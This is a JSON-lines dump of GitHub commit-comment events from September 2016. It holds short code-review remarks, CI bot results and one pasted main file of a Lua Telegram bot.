{"id":"4521570452","type":"CommitCommentEvent","actor":{"login":"tahonermann"},"repo":{"name":"tahonermann/text_view"},"payload":{"comment":{"id":18911640,"position":24,"line":22,"path":"CMakeLists.txt","commit_id":"d0f03e5c9ca48716fdff9244f4649410966eb1aa","created_at":"2016-09-06T14:14:30Z","updated_at":"2016-09-06T14:14:30Z","body":"And, it turns out that there was code tripped up by use of <tt>-Werror</tt> only in release builds.  The tests and examples had code that used variables only in calls to assert(), so those variables were \"unused\" when <tt>NDEBUG</tt> was defined.  Apparently I had never bothered trying to build non-debug before.  Fixed in commit acc1fd044d159bc4b24711e963c6ed9b45131e44."}},"created_at":"2016-09-06T14:14:30Z"}
{"id":"4521571780","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18911644,"position":38,"line":166,"path":"fcrepo-export/src/main/java/org/fcrepo/exporter/Exporter.java","commit_id":"a59ade888515142d359685280d33f06291b2fdc8","created_at":"2016-09-06T14:14:43Z","updated_at":"2016-09-06T14:14:43Z","body":"@mikedurbin Careful-- in the _current_ version of the spec there may be multiple descriptions. We just don't implement that, for now. I would actually like to implement that, but it's obviously a low priority."}},"created_at":"2016-09-06T14:14:43Z"}
{"id":"4521575990","type":"CommitCommentEvent","actor":{"login":"lucatorella"},"repo":{"name":"apache/cordova-plugin-wkwebview-engine"},"payload":{"comment":{"id":18911656,"position":80,"line":80,"path":"src/ios/CDVWKWebViewEngine.m","commit_id":"40f6b4538cb063a7de9a454190d652247c5dadee","created_at":"2016-09-06T14:15:26Z","updated_at":"2016-09-06T14:15:26Z","body":"@\"cordova\" -> CDV_BRIDGE_NAME"}},"created_at":"2016-09-06T14:15:26Z"}
{"id":"4521576316","type":"CommitCommentEvent","actor":{"login":"tokenrove"},"repo":{"name":"tokenrove/extrospect-beam"},"payload":{"comment":{"id":18911657,"position":11,"line":11,"path":"src/beam.h","commit_id":"d6bc829bccd5768e99e58119f424b83559cda240","created_at":"2016-09-06T14:15:29Z","updated_at":"2016-09-06T14:15:29Z","body":"This reflects the naming in the ERTS source."}},"created_at":"2016-09-06T14:15:29Z"}
{"id":"4521577090","type":"CommitCommentEvent","actor":{"login":"nsheff"},"repo":{"name":"epigen/pypiper"},"payload":{"comment":{"id":18911660,"position":null,"line":null,"path":null,"commit_id":"9184023bc494cec070aa481a32c175dc82946b01","created_at":"2016-09-06T14:15:36Z","updated_at":"2016-09-06T14:15:36Z","body":"It's a typo on line 124... `cmd =` should be `cmd +=` (it's overwriting cmd). So the first line of the command was getting left out.\r\n\r\nI guess my test was only on paired-end data, sorry. "}},"created_at":"2016-09-06T14:15:36Z"}
{"id":"4521578316","type":"CommitCommentEvent","actor":{"login":"alilotfi124"},"repo":{"name":"alilotfi124/-zEntOm"},"payload":{"comment":{"id":18911664,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-06T14:15:47Z","updated_at":"2016-09-06T14:15:47Z","body":"sudo_user\r\n"}},"created_at":"2016-09-06T14:15:47Z"}
{"id":"4521581610","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"bioconda/bioconda-recipes"},"payload":{"comment":{"id":18911669,"position":null,"line":null,"path":null,"commit_id":"a18fee3e3ff7638cd7bc49956160e1b6c3d0cf09","created_at":"2016-09-06T14:16:20Z","updated_at":"2016-09-06T14:16:20Z","body":"I just encountered that a test is missing. @abretaud do you mind to add one.\r\nThanks."}},"created_at":"2016-09-06T14:16:20Z"}
{"id":"4521582042","type":"CommitCommentEvent","actor":{"login":"yamorad"},"repo":{"name":"carlosbalamba/MIKEBOL"},"payload":{"comment":{"id":18911670,"position":null,"line":null,"path":null,"commit_id":"b609a9ac9fe48605bd793ce75b5467562901beea","created_at":"2016-09-06T14:16:24Z","updated_at":"2016-09-06T14:16:24Z","body":"[EXPOSICION PROYECTO.pptx](https://github.com/carlosbalamba/MIKEBOL/files/456895/EXPOSICION.PROYECTO.pptx)\r\n"}},"created_at":"2016-09-06T14:16:24Z"}
{"id":"4521586402","type":"CommitCommentEvent","actor":{"login":"Lilymeng"},"repo":{"name":"Lilymeng/NEUQOJ"},"payload":{"comment":{"id":18911679,"position":null,"line":null,"path":null,"commit_id":"dfe430b5a9b732b2ed0a90d7974bc36baac2f9ef","created_at":"2016-09-06T14:17:05Z","updated_at":"2016-09-06T14:17:05Z","body":"S打发"}},"created_at":"2016-09-06T14:17:05Z"}
{"id":"4521590247","type":"CommitCommentEvent","actor":{"login":"nsheff"},"repo":{"name":"epigen/pypiper"},"payload":{"comment":{"id":18911690,"position":null,"line":null,"path":null,"commit_id":"11241367b0d51d56bfaddbc1266a4f008a892641","created_at":"2016-09-06T14:17:45Z","updated_at":"2016-09-06T14:17:45Z","body":"OK, but this is effectively hard-coding in the `tools` and `parameters` config sections, which really is just convention and ideally shouldn't be hard coded...  right?\r\n\r\nIn other words, this works, but we can't we think of a better way to solve this?"}},"created_at":"2016-09-06T14:17:45Z"}
{"id":"4521591071","type":"CommitCommentEvent","actor":{"login":"TestNemo"},"repo":{"name":"TestNemo/Hello-world"},"payload":{"comment":{"id":18911692,"position":3,"line":3,"path":"README.md","commit_id":"2566778796bd75f2ef358f000adf4b614b439f0f","created_at":"2016-09-06T14:17:52Z","updated_at":"2016-09-06T14:17:52Z","body":"It is not good. "}},"created_at":"2016-09-06T14:17:52Z"}
{"id":"4521591180","type":"CommitCommentEvent","actor":{"login":"casovi"},"repo":{"name":"sanjami/jsstudy"},"payload":{"comment":{"id":18911693,"position":25,"line":25,"path":"Vuk/anketa/anketa.html","commit_id":"be447a60ebe908b66a6049bf488ccf3955f23dc6","created_at":"2016-09-06T14:17:53Z","updated_at":"2016-09-06T14:17:53Z","body":"Form ti apsolutno nigde ne treba.\r\n\r\nOn ti treba kad saljes podatke na server na obradu (tipa PHP-u). Form ima smisla samo kad imas action atribut i kad imas dugme koje ce da pokrene tu akciju. Ako me razumes. :)"}},"created_at":"2016-09-06T14:17:53Z"}
{"id":"4521592425","type":"CommitCommentEvent","actor":{"login":"TestNemo"},"repo":{"name":"TestNemo/Hello-world"},"payload":{"comment":{"id":18911695,"position":1,"line":1,"path":"README.md","commit_id":"2566778796bd75f2ef358f000adf4b614b439f0f","created_at":"2016-09-06T14:18:07Z","updated_at":"2016-09-06T14:18:07Z","body":"not good."}},"created_at":"2016-09-06T14:18:07Z"}
{"id":"4521594072","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18911697,"position":null,"line":null,"path":null,"commit_id":"3ee1d9a320921233304784a6ab6ee7d1168512b1","created_at":"2016-09-06T14:18:22Z","updated_at":"2016-09-06T14:18:22Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#XUHmsEdpQyer6xak961Sxw"}},"created_at":"2016-09-06T14:18:22Z"}
{"id":"4521594973","type":"CommitCommentEvent","actor":{"login":"vstakhov"},"repo":{"name":"fatalbanana/rspamd"},"payload":{"comment":{"id":18911698,"position":130,"line":654,"path":"src/plugins/dkim_check.c","commit_id":"101bd383fda6a2b212f502c5d5793b84e9564ce7","created_at":"2016-09-06T14:18:29Z","updated_at":"2016-09-06T14:18:29Z","body":"There is memory leak here. You should prepend data to messages, not to NULL."}},"created_at":"2016-09-06T14:18:29Z"}
{"id":"4521595839","type":"CommitCommentEvent","actor":{"login":"alilotfi124"},"repo":{"name":"alilotfi124/GLORY"},"payload":{"comment":{"id":18911700,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-06T14:18:38Z","updated_at":"2016-09-06T14:18:38Z","body":"sudo_user = {1}\r\n"}},"created_at":"2016-09-06T14:18:38Z"}
{"id":"4521603033","type":"CommitCommentEvent","actor":{"login":"koekeishiya"},"repo":{"name":"koekeishiya/kwm"},"payload":{"comment":{"id":18911708,"position":null,"line":null,"path":null,"commit_id":"7ab57595e77c209730a422f33a180706e9b84b2b","created_at":"2016-09-06T14:19:49Z","updated_at":"2016-09-06T14:19:49Z","body":"I'll make sure to try and monitor the behaviour more closely on my end as well during longer periods of time."}},"created_at":"2016-09-06T14:19:49Z"}
{"id":"4521603627","type":"CommitCommentEvent","actor":{"login":"csenger"},"repo":{"name":"csenger/sc.social.like"},"payload":{"comment":{"id":18911709,"position":null,"line":null,"path":null,"commit_id":"ce5f69447a4711148ab1b500e7b0210f2c3fb20e","created_at":"2016-09-06T14:19:55Z","updated_at":"2016-09-06T14:19:55Z","body":"@hvelarde: The plugin calls urlencode to generate a different URL in line 69. urlencode() does not handle unicode input (unless it contains only ascii chars). So I encode the title to utf-8. The title usually is unicode. But for the case it's not I added a `safe_unicode()` to be sure.\r\n\r\nThe other case above uses url_quote from this import:\r\n\r\n`from Products.PythonScripts.standard import url_quote`\r\n\r\nurl_quote() does the same conversion to utf-8 before it calls urllib. But the module is only there to add a security declaration for DTML functions from `DocumentTemplate.DT_VAR` so they work in restricted Python. Even so it works in the current Plone stack writing code that relies on layers of legacy code is a no go IMHO. I think `url_quote()` should be replaced too and the plugin should do the conversion in both cases.\r\n\r\nI could update it to do that a bit nicer, but the code is not too complicated anyway.\r\n"}},"created_at":"2016-09-06T14:19:55Z"}
{"id":"4521604855","type":"CommitCommentEvent","actor":{"login":"vstakhov"},"repo":{"name":"fatalbanana/rspamd"},"payload":{"comment":{"id":18911711,"position":131,"line":655,"path":"src/plugins/dkim_check.c","commit_id":"101bd383fda6a2b212f502c5d5793b84e9564ce7","created_at":"2016-09-06T14:20:08Z","updated_at":"2016-09-06T14:20:08Z","body":"Maybe, you also need to to mempool_strdup here. Not sure."}},"created_at":"2016-09-06T14:20:08Z"}
{"id":"4521612542","type":"CommitCommentEvent","actor":{"login":"alilotfi124"},"repo":{"name":"alilotfi124/GLORY"},"payload":{"comment":{"id":18911725,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-06T14:21:24Z","updated_at":"2016-09-06T14:21:24Z","body":"package.path = package.path .. ';.luarocks/share/lua/5.2/?.lua'\r\n  ..';.luarocks/share/lua/5.2/?/init.lua'\r\npackage.cpath = package.cpath .. ';.luarocks/lib/lua/5.2/?.so'\r\n\r\nrequire(\"./bot/utils\")\r\n\r\nlocal f = assert(io.popen('/usr/bin/git describe --tags', 'r'))\r\nVERSION = assert(f:read('*a'))\r\nf:close()\r\n\r\n-- This function is called when tg receive a msg\r\nfunction on_msg_receive (msg)\r\n  if not started then\r\n    return\r\n  end\r\n\r\n  local receiver = get_receiver(msg)\r\n\r\n  -- vardump(msg)\r\n  msg = pre_process_service_msg(msg)\r\n  if msg_valid(msg) then\r\n    msg = pre_process_msg(msg)\r\n    if msg then\r\n      match_plugins(msg)\r\n      mark_read(receiver, ok_cb, false)\r\n    end\r\n  end\r\nend\r\n\r\nfunction ok_cb(extra, success, result)\r\nend\r\n\r\nfunction on_binlog_replay_end()\r\n  started = true\r\n  postpone (cron_plugins, false, 60*5.0)\r\n  -- See plugins/isup.lua as an example for cron\r\n\r\n  _config = load_config()\r\n\r\n  -- load plugins\r\n  plugins = {}\r\n  load_plugins()\r\nend\r\n\r\nfunction msg_valid(msg)\r\n  -- Don't process outgoing messages\r\n  if msg.out then\r\n    print('\\27[36mNot valid: msg from us\\27[39m')\r\n    return false\r\n  end\r\n\r\n  -- Before bot was started\r\n  if msg.date < now then\r\n    print('\\27[36mNot valid: old msg\\27[39m')\r\n    return false\r\n  end\r\n\r\n  if msg.unread == 0 then\r\n    print('\\27[36mNot valid: readed\\27[39m')\r\n    return false\r\n  end\r\n\r\n  if not msg.to.id then\r\n    print('\\27[36mNot valid: To id not provided\\27[39m')\r\n    return false\r\n  end\r\n\r\n  if not msg.from.id then\r\n    print('\\27[36mNot valid: From id not provided\\27[39m')\r\n    return false\r\n  end\r\n\r\n  if msg.from.id == our_id then\r\n    print('\\27[36mNot valid: Msg from our id\\27[39m')\r\n    return false\r\n  end\r\n\r\n  if msg.to.type == 'encr_chat' then\r\n    print('\\27[36mNot valid: Encrypted chat\\27[39m')\r\n    return false\r\n  end\r\n\r\n  if msg.from.id == 777000 then\r\n    print('\\27[36mNot valid: Telegram message\\27[39m')\r\n    return false\r\n  end\r\n\r\n  return true\r\nend\r\n\r\n--\r\nfunction pre_process_service_msg(msg)\r\n   if msg.service then\r\n      local action = msg.action or {type=\"\"}\r\n      -- Double ! to discriminate of normal actions\r\n      msg.text = \"!!tgservice \" .. action.type\r\n\r\n      -- wipe the data to allow the bot to read service messages\r\n      if msg.out then\r\n         msg.out = false\r\n      end\r\n      if msg.from.id == our_id then\r\n         msg.from.id = 0\r\n      end\r\n   end\r\n   return msg\r\nend\r\n\r\n-- Apply plugin.pre_process function\r\nfunction pre_process_msg(msg)\r\n  for name,plugin in pairs(plugins) do\r\n    if plugin.pre_process and msg then\r\n      print('Preprocess', name)\r\n      msg = plugin.pre_process(msg)\r\n    end\r\n  end\r\n\r\n  return msg\r\nend\r\n\r\n-- Go over enabled plugins patterns.\r\nfunction match_plugins(msg)\r\n  for name, plugin in pairs(plugins) do\r\n    match_plugin(plugin, name, msg)\r\n  end\r\nend\r\n\r\n-- Check if plugin is on _config.disabled_plugin_on_chat table\r\nlocal function is_plugin_disabled_on_chat(plugin_name, receiver)\r\n  local disabled_chats = _config.disabled_plugin_on_chat\r\n  -- Table exists and chat has disabled plugins\r\n  if disabled_chats and disabled_chats[receiver] then\r\n    -- Checks if plugin is disabled on this chat\r\n    for disabled_plugin,disabled in pairs(disabled_chats[receiver]) do\r\n      if disabled_plugin == plugin_name and disabled then\r\n        local warning = 'Plugin '..disabled_plugin..' is disabled on this chat'\r\n        print(warning)\r\n        send_msg(receiver, warning, ok_cb, false)\r\n        return true\r\n      end\r\n    end\r\n  end\r\n  return false\r\nend\r\n\r\nfunction match_plugin(plugin, plugin_name, msg)\r\n  local receiver = get_receiver(msg)\r\n\r\n  -- Go over patterns. If one matches it's enough.\r\n  for k, pattern in pairs(plugin.patterns) do\r\n    local matches = match_pattern(pattern, msg.text)\r\n    if matches then\r\n      print(\"msg matches: \", pattern)\r\n\r\n      if is_plugin_disabled_on_chat(plugin_name, receiver) then\r\n        return nil\r\n      end\r\n      -- Function exists\r\n      if plugin.run then\r\n        -- If plugin is for privileged users only\r\n        if not warns_user_not_allowed(plugin, msg) then\r\n          local result = plugin.run(msg, matches)\r\n          if result then\r\n            send_large_msg(receiver, result)\r\n          end\r\n        end\r\n      end\r\n      -- One patterns matches\r\n      return\r\n    end\r\n  end\r\nend\r\n\r\n-- DEPRECATED, use send_large_msg(destination, text)\r\nfunction _send_msg(destination, text)\r\n  send_large_msg(destination, text)\r\nend\r\n\r\n-- Save the content of _config to config.lua\r\nfunction save_config( )\r\n  serialize_to_file(_config, './data/config.lua')\r\n  print ('saved config into ./data/config.lua')\r\nend\r\n\r\n-- Returns the config from config.lua file.\r\n-- If file doesn't exist, create it.\r\nfunction load_config( )\r\n  local f = io.open('./data/config.lua', \"r\")\r\n  -- If config.lua doesn't exist\r\n  if not f then\r\n    print (\"Created new config file: data/config.lua\")\r\n    create_config()\r\n  else\r\n    f:close()\r\n  end\r\n  local config = loadfile (\"./data/config.lua\")()\r\n  for v,user in pairs(config.sudo_users) do\r\n    print(\"Allowed user: \" .. user)\r\n  end\r\n  return config\r\nend\r\n\r\n-- Create a basic config.json file and saves it.\r\nfunction create_config( )\r\n  -- A simple config with basic plugins and ourselves as privileged user\r\n  config = {\r\n    enabled_plugins = {\r\n      \"9gag\",\r\n      \"eur\",\r\n      \"echo\",\r\n      \"btc\",\r\n      \"get\",\r\n      \"giphy\",\r\n      \"google\",\r\n      \"gps\",\r\n      \"help\",\r\n      \"id\",\r\n      \"images\",\r\n      \"img_google\",\r\n      \"location\",\r\n      \"media\",\r\n      \"plugins\",\r\n      \"channels\",\r\n      \"set\",\r\n      \"stats\",\r\n      \"time\",\r\n      \"version\",\r\n      \"weather\",\r\n      \"xkcd\",\r\n      \"youtube\" },\r\n    sudo_users = {168398326},\r\n    disabled_channels = {}\r\n  }\r\n  serialize_to_file(config, './data/config.lua')\r\n  print ('saved config into ./data/config.lua')\r\nend\r\n\r\nfunction on_our_id (id)\r\n  our_id = id\r\nend\r\n\r\nfunction on_user_update (user, what)\r\n  --vardump (user)\r\nend\r\n\r\nfunction on_chat_update (chat, what)\r\n  --vardump (chat)\r\nend\r\n\r\nfunction on_secret_chat_update (schat, what)\r\n  --vardump (schat)\r\nend\r\n\r\nfunction on_get_difference_end ()\r\nend\r\n\r\n-- Enable plugins in config.json\r\nfunction load_plugins()\r\n  for k, v in pairs(_config.enabled_plugins) do\r\n    print(\"Loading plugin\", v)\r\n\r\n    local ok, err =  pcall(function()\r\n      local t = loadfile(\"plugins/\"..v..'.lua')()\r\n      plugins[v] = t\r\n    end)\r\n\r\n    if not ok then\r\n      print('\\27[31mError loading plugin '..v..'\\27[39m')\r\n      print('\\27[31m'..err..'\\27[39m')\r\n    end\r\n\r\n  end\r\nend\r\n\r\n-- Call and postpone execution for cron plugins\r\nfunction cron_plugins()\r\n\r\n  for name, plugin in pairs(plugins) do\r\n    -- Only plugins with cron function\r\n    if plugin.cron ~= nil then\r\n      plugin.cron()\r\n    end\r\n  end\r\n\r\n  -- Called again in 5 mins\r\n  postpone (cron_plugins, false, 5*60.0)\r\nend\r\n\r\n-- Start and load values\r\nour_id = 0\r\nnow = os.time()\r\nmath.randomseed(now)\r\nstarted = false"}},"created_at":"2016-09-06T14:21:24Z"}
{"id":"4521615142","type":"CommitCommentEvent","actor":{"login":"cmspixelpilot"},"repo":{"name":"jordantucker/cmssw-usercode"},"payload":{"comment":{"id":18911732,"position":null,"line":null,"path":null,"commit_id":"d66b759bee98866c41afccc1a8e07636fe963933","created_at":"2016-09-06T14:21:50Z","updated_at":"2016-09-06T14:21:50Z","body":"the indices of cov() are only right for h0, for h1 they should be 2 and 3"}},"created_at":"2016-09-06T14:21:50Z"}
{"id":"4521621870","type":"CommitCommentEvent","actor":{"login":"pboca"},"repo":{"name":"pboca/ovs"},"payload":{"comment":{"id":18911742,"position":304,"line":752,"path":"datapath-windows/ovsext/TunnelFilter.c","commit_id":"513ecd81fa270f109ec7e683331b2ddbeb44ca52","created_at":"2016-09-06T14:22:53Z","updated_at":"2016-09-06T14:22:53Z","body":"Register the callouts"}},"created_at":"2016-09-06T14:22:53Z"}
{"id":"4521622966","type":"CommitCommentEvent","actor":{"login":"pboca"},"repo":{"name":"pboca/ovs"},"payload":{"comment":{"id":18911746,"position":317,"line":767,"path":"datapath-windows/ovsext/TunnelFilter.c","commit_id":"513ecd81fa270f109ec7e683331b2ddbeb44ca52","created_at":"2016-09-06T14:23:05Z","updated_at":"2016-09-06T14:23:05Z","body":"Add generic filters to the callouts"}},"created_at":"2016-09-06T14:23:05Z"}
{"id":"4521624184","type":"CommitCommentEvent","actor":{"login":"oalexey"},"repo":{"name":"xbadcode/Rubezh"},"payload":{"comment":{"id":18911753,"position":3,"line":49,"path":"Projects/FireMonitor/Modules/SKDModule/Departments/ViewModels/DepartmentDetailsViewModel.cs","commit_id":"6373e14c083c7b983f47b2f823f4f51d1d58ee62","created_at":"2016-09-06T14:23:18Z","updated_at":"2016-09-06T14:23:18Z","body":"\"Эту команду тоже заодно лучше захватить в метод инициализации команд\"\r\nО какой команде идет речь? **SelectDepartmentCommand = new RelayCommand(OnSelectDepartment)**?\r\nЕсли \"да\", то в том то и суть, чтобы при вызове инициализатора **bool Initialize(Organisation organisation, ShortDepartment shortDepartment, ViewPartViewModel parentViewModel)** эта команда была активной.\r\nПеренос инициализации команд (общих для обоих инициализаторов) в конструктор возможен конечно. Просто получится что часть команд инициализируются в конструкторе, часть в методах инициализаторах."}},"created_at":"2016-09-06T14:23:18Z"}
{"id":"4521629603","type":"CommitCommentEvent","actor":{"login":"pboca"},"repo":{"name":"pboca/ovs"},"payload":{"comment":{"id":18911768,"position":252,"line":605,"path":"datapath-windows/ovsext/TunnelFilter.c","commit_id":"513ecd81fa270f109ec7e683331b2ddbeb44ca52","created_at":"2016-09-06T14:24:11Z","updated_at":"2016-09-06T14:24:11Z","body":"For future compatibility this filter should be added also for FWPM_LAYER_INBOUND_IPPACKET_V4."}},"created_at":"2016-09-06T14:24:11Z"}
{"id":"4521636272","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18911777,"position":null,"line":null,"path":null,"commit_id":"ed3d9ce68b87e3039a8574ccb19fb79037e1f1a9","created_at":"2016-09-06T14:25:14Z","updated_at":"2016-09-06T14:25:14Z","body":"going to work on babel/webpack config right now"}},"created_at":"2016-09-06T14:25:14Z"}
{"id":"4521637332","type":"CommitCommentEvent","actor":{"login":"catb0t"},"repo":{"name":"exercism/xfactor"},"payload":{"comment":{"id":18911780,"position":null,"line":null,"path":null,"commit_id":"856b65d4cc93a2f0d3dce80d4f6588f649d9f1b2","created_at":"2016-09-06T14:25:24Z","updated_at":"2016-09-06T14:25:24Z","body":"...why?"}},"created_at":"2016-09-06T14:25:24Z"}
{"id":"4521637974","type":"CommitCommentEvent","actor":{"login":"oalexey"},"repo":{"name":"xbadcode/Rubezh"},"payload":{"comment":{"id":18911782,"position":22,"line":553,"path":"Projects/FireMonitor/Modules/SKDModule/Employees/ViewModels/EmployeeDetails/EmployeeDetailsViewModel.cs","commit_id":"bbaa7aadbe651e4ae232ea01afe8cd92e5857531","created_at":"2016-09-06T14:25:29Z","updated_at":"2016-09-06T14:25:29Z","body":"Так, давай ты свой вариант здесь напишешь и мы его обсудим. А то мы так долго еще будем \"обмусоливать\" данный код. То ли я тебя не понимаю, то ли что-то еще."}},"created_at":"2016-09-06T14:25:29Z"}
{"id":"4521645426","type":"CommitCommentEvent","actor":{"login":"TheDeibo"},"repo":{"name":"thelucyclub/iNET"},"payload":{"comment":{"id":18911798,"position":null,"line":null,"path":null,"commit_id":"fa89c7a29e855b8124c73322d2427594362cac1e","created_at":"2016-09-06T14:26:38Z","updated_at":"2016-09-06T14:26:38Z","body":"Although you deleted the LICENSE folder, you still have proven to hold a APACHE License to the thing. You must use this licence https://github.com/PocketMine/PocketMine-MP/blob/master/LICENSE or else you can be taken down by a DMCA Complaint.  Use EXACTLY that license. Any change to that licence can still result in a DMCA Complaint taking it down."}},"created_at":"2016-09-06T14:26:38Z"}
{"id":"4521646260","type":"CommitCommentEvent","actor":{"login":"casovi"},"repo":{"name":"sanjami/jsstudy"},"payload":{"comment":{"id":18911802,"position":32,"line":32,"path":"Vuk/anketa/anketa.html","commit_id":"be447a60ebe908b66a6049bf488ccf3955f23dc6","created_at":"2016-09-06T14:26:46Z","updated_at":"2016-09-06T14:26:46Z","body":"tree je drvo, three je 3. :)"}},"created_at":"2016-09-06T14:26:46Z"}
{"id":"4521652980","type":"CommitCommentEvent","actor":{"login":"nsheff"},"repo":{"name":"epigen/pypiper"},"payload":{"comment":{"id":18911823,"position":null,"line":null,"path":null,"commit_id":"11241367b0d51d56bfaddbc1266a4f008a892641","created_at":"2016-09-06T14:27:49Z","updated_at":"2016-09-06T14:27:49Z","body":"Furthermore, this does not solve the case of when a pm IS passed, but it lacks a tools section (this is the problem I just ran into)"}},"created_at":"2016-09-06T14:27:49Z"}
{"id":"4521653183","type":"CommitCommentEvent","actor":{"login":"lov3catch"},"repo":{"name":"lov3catch/moorzilka"},"payload":{"comment":{"id":18911824,"position":2,"line":2,"path":".env.example","commit_id":"c046d8280630b68d466b1cff5edf6d3002433928","created_at":"2016-09-06T14:27:51Z","updated_at":"2016-09-06T14:27:51Z","body":"что за нахуй"}},"created_at":"2016-09-06T14:27:51Z"}
{"id":"4521653241","type":"CommitCommentEvent","actor":{"login":"ZielonyBuszmen"},"repo":{"name":"ZielonyBuszmen/afafs"},"payload":{"comment":{"id":18911825,"position":7,"line":6,"path":"index.php","commit_id":"91364e16aa20f79b002daaec1b7c87ec1f130a1c","created_at":"2016-09-06T14:27:52Z","updated_at":"2016-09-06T14:27:52Z","body":"Ty zbóju, jak ty programujesz!"}},"created_at":"2016-09-06T14:27:52Z"}
{"id":"4521653962","type":"CommitCommentEvent","actor":{"login":"xcir"},"repo":{"name":"xcir/varnish-cache"},"payload":{"comment":{"id":18911829,"position":null,"line":null,"path":null,"commit_id":"a2bc302df390c22ff1f5b20ca65e08172e11402f","created_at":"2016-09-06T14:27:59Z","updated_at":"2016-09-06T14:27:59Z","body":"Output sample\r\n```\r\n$ sudo /opt/trunk-varnish/bin/varnishncsa  -F \"TimeStamp:%{VSL:TimeStamp}x TimpStamp[2]:%{VSL:TimeStamp[2]}x TimeStamp:Resp:%{VSL:TimeStamp:resp}x TimeStamp:Resp[2]:%{VSL:TimeStamp:resp[2]}x TimeStamp:foo:%{VSL:TimeStamp:foo}x\"\r\nTimeStamp:Start: 1473128417.134582 0.000000 0.000000 TimpStamp[2]:1473128417.134582 TimeStamp:Resp:1473128417.134751 0.000169 0.000121 TimeStamp:Resp[2]:0.000169 TimeStamp:foo:-\r\n\r\n$ sudo /opt/trunk-varnish/bin/varnishlog -graw -itimestamp\r\n     65538 Timestamp      c Start: 1473128417.134582 0.000000 0.000000\r\n     65538 Timestamp      c Req: 1473128417.134582 0.000000 0.000000\r\n     65538 Timestamp      c Process: 1473128417.134630 0.000048 0.000048\r\n     65538 Timestamp      c Resp: 1473128417.134751 0.000169 0.000121\r\n\r\n```"}},"created_at":"2016-09-06T14:27:59Z"}
{"id":"4521664122","type":"CommitCommentEvent","actor":{"login":"KonstantinDavidov"},"repo":{"name":"xbadcode/Rubezh"},"payload":{"comment":{"id":18911847,"position":3,"line":49,"path":"Projects/FireMonitor/Modules/SKDModule/Departments/ViewModels/DepartmentDetailsViewModel.cs","commit_id":"6373e14c083c7b983f47b2f823f4f51d1d58ee62","created_at":"2016-09-06T14:29:34Z","updated_at":"2016-09-06T14:29:34Z","body":"Да, речь про **SelectDepartmentCommand**. \r\nСейчас метод **InitializeCommands()** вызывается в обоих методах инициализации. Следовательно, если перенести инициализацию команды **SelectDepartmentCommand**  в этот метод, то команда будет активна при любом вызове метода инициализации (а не как сейчас, при вызове одного).\r\n\r\n> Просто получится что часть команд инициализируются в конструкторе, часть в методах инициализаторах.\r\n\r\nНе обязательно. Можно же инициализацию вообще всех команд в конструктор перенести, а не частично."}},"created_at":"2016-09-06T14:29:34Z"}
{"id":"4521665202","type":"CommitCommentEvent","actor":{"login":"nsheff"},"repo":{"name":"epigen/pypiper"},"payload":{"comment":{"id":18911850,"position":null,"line":null,"path":null,"commit_id":"11241367b0d51d56bfaddbc1266a4f008a892641","created_at":"2016-09-06T14:29:45Z","updated_at":"2016-09-06T14:29:45Z","body":"Also, in addition to the above, this fails when a pm is not passed, but NGStk runs a command through `pm.run` such as in `merge_or_link`"}},"created_at":"2016-09-06T14:29:45Z"}
{"id":"4521665700","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18911851,"position":null,"line":null,"path":null,"commit_id":"e90a99f1be01d4d00e2e0d9715872200ae0c2fb6","created_at":"2016-09-06T14:29:50Z","updated_at":"2016-09-06T14:29:50Z","body":"Score of plus_3 vs base: 143 - 102 - 346  [0.535] 591 Elo +24    tc=5+0.05\r\n\r\nIt amazing, my computer very often delivers so ridiculous results like this one, \r\nI just post them here to have a history about my local test results..."}},"created_at":"2016-09-06T14:29:50Z"}
{"id":"4521668153","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18911859,"position":null,"line":null,"path":null,"commit_id":"e852cd432a5b921ab5eb936219bbe17162498585","created_at":"2016-09-06T14:30:17Z","updated_at":"2016-09-06T14:30:17Z","body":"MoreDayliteFollowup (JasonGlazer) - i386-Windows-7-VisualStudio-12: OK (2325 of 2332 tests passed, 25 test warnings)\n\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: EIO diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T14:30:17Z"}
{"id":"4521671067","type":"CommitCommentEvent","actor":{"login":"cdietzgit"},"repo":{"name":"epigen/pypiper"},"payload":{"comment":{"id":18911865,"position":null,"line":null,"path":null,"commit_id":"9184023bc494cec070aa481a32c175dc82946b01","created_at":"2016-09-06T14:30:42Z","updated_at":"2016-09-06T14:30:42Z","body":"No problem, we just needed something that worked for the moment. I temporarily rolled back to the old function as default. Push the fixes when you can."}},"created_at":"2016-09-06T14:30:42Z"}
{"id":"4521672648","type":"CommitCommentEvent","actor":{"login":"jmaher"},"repo":{"name":"mozilla/ouija"},"payload":{"comment":{"id":18911871,"position":null,"line":null,"path":null,"commit_id":"10eb405dd2efb69ab63cc8df8ad1400d74777d8c","created_at":"2016-09-06T14:30:55Z","updated_at":"2016-09-06T14:30:55Z","body":"@MikeLing I accidentally pushed these changes- they were running on the live instance anyway- could you r? and I can address issues in a followup"}},"created_at":"2016-09-06T14:30:55Z"}
